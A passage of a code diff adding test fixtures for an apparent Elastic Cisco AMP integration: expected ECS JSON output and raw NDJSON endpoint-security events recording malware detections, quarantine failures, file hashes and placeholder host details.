+                    "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc",
+                    "e9d8c15e7d18678dd41771f72ed6693c",
+                    "ec80314ae4a2817be806b7ae27dbdb31a88226a0"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Dyre",
+                "hostname": "Demo_Dyre"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581799549Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258014979293000,\"timestamp\":1610705609,\"timestamp_nanoseconds\":581000000,\"date\":\"2021-01-15T10:13:29+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258014979293255\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6176258014979293000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "GenericKD:Dyreza-tpd",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "23:d5:92:eb:f8:9b",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "23:d5:92:eb:f8:9b"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6176258014979293255",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:13:17.000Z",
+            "file": {
+                "name": "webinstall.exe",
+                "path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe",
+                "hash": {
+                    "sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0",
+                    "sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc",
+                    "md5": "e9d8c15e7d18678dd41771f72ed6693c"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Dyre"
+                ],
+                "hash": [
+                    "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc",
+                    "e9d8c15e7d18678dd41771f72ed6693c",
+                    "ec80314ae4a2817be806b7ae27dbdb31a88226a0"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Dyre",
+                "hostname": "Demo_Dyre"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581801458Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176257963439686000,\"timestamp\":1610705597,\"timestamp_nanoseconds\":569000000,\"date\":\"2021-01-15T10:13:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176257963439685702\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6176257963439686000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "GenericKD:Dyreza-tpd",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "23:d5:92:eb:f8:9b",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "23:d5:92:eb:f8:9b"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6176257963439685702",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:12:53.000Z",
+            "file": {
+                "name": "ekjrngjker.exe",
+                "path": "\\\\?\\C:\\ekjrngjker.exe",
+                "hash": {
+                    "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
+                    "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "md5": "b99e0a8c56f963246b6464b9fffbf7a2"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_AMP_Threat_Audit"
+                ],
+                "hash": [
+                    "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "b99e0a8c56f963246b6464b9fffbf7a2",
+                    "b024546a49bad1bd60fccef0a5d11b55f9a442c4"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Threat_Audit",
+                "hostname": "Demo_AMP_Threat_Audit",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581803331Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":778000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667579691532307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6533667579691532000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "63:5f:47:2b:89:91",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "63:5f:47:2b:89:91"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6533667579691532307",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:12:53.000Z",
+            "file": {
+                "name": "ekjrngjker.exe",
+                "path": "C:\\ekjrngjker.exe",
+                "hash": {
+                    "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
+                    "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "md5": "b99e0a8c56f963246b6464b9fffbf7a2"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_AMP_Threat_Audit"
+                ],
+                "hash": [
+                    "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "b99e0a8c56f963246b6464b9fffbf7a2",
+                    "b024546a49bad1bd60fccef0a5d11b55f9a442c4"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Threat_Audit",
+                "user": {
+                    "name": "user@testdomain.com"
+                },
+                "hostname": "Demo_AMP_Threat_Audit"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581805234Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":747000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667579691532306\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6533667579691532000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.DFC.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "63:5f:47:2b:89:91",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "63:5f:47:2b:89:91"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6533667579691532306",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:12:53.000Z",
+            "file": {
+                "name": "ekjrngjker.exe",
+                "path": "\\\\?\\C:\\ekjrngjker.exe",
+                "hash": {
+                    "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
+                    "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "md5": "b99e0a8c56f963246b6464b9fffbf7a2"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_AMP_Threat_Audit"
+                ],
+                "hash": [
+                    "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "b99e0a8c56f963246b6464b9fffbf7a2",
+                    "b024546a49bad1bd60fccef0a5d11b55f9a442c4"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Threat_Audit",
+                "hostname": "Demo_AMP_Threat_Audit",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581807110Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":371000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667579691532305\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6533667579691532000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.DFC.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "63:5f:47:2b:89:91",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "63:5f:47:2b:89:91"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6533667579691532305",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:12:52.000Z",
+            "file": {
+                "name": "ekjrngjker.exe",
+                "path": "C:\\ekjrngjker.exe",
+                "hash": {
+                    "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
+                    "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "md5": "b99e0a8c56f963246b6464b9fffbf7a2"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_AMP_Threat_Audit"
+                ],
+                "hash": [
+                    "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "b99e0a8c56f963246b6464b9fffbf7a2",
+                    "b024546a49bad1bd60fccef0a5d11b55f9a442c4"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Threat_Audit",
+                "user": {
+                    "name": "user@testdomain.com"
+                },
+                "hostname": "Demo_AMP_Threat_Audit"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:17.581809002Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667575396565000,\"timestamp\":1610705572,\"timestamp_nanoseconds\":971000000,\"date\":\"2021-01-15T10:12:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667575396565008\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6533667575396565000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.DFC.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "63:5f:47:2b:89:91",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "63:5f:47:2b:89:91"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6533667575396565008",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        }
+    ]
+}
\ No newline at end of file
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp4.ndjson.log b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp4.ndjson.log
new file mode 100644
index 00000000000..f31bf18a23a
--- /dev/null
+++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp4.ndjson.log
@@ -0,0 +1,100 @@
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6508397899087348000,"timestamp":1610659036,"timestamp_nanoseconds":295927133,"date":"2021-01-14T21:17:16+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.6A37D750F0-100.SBX.TG","detection_id":"6508397899087347713","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14930696955218,"timestamp":1610656706,"timestamp_nanoseconds":844899579,"date":"2021-01-14T20:38:26+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.E4FCCBFA69-95.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610656706,"start_date":"2021-01-14T20:38:26+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412680266518626319","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412680266518626317","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626319","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"process_id":7120,"disposition":"Malicious","file_name":"QuotaGroup.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":572000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat 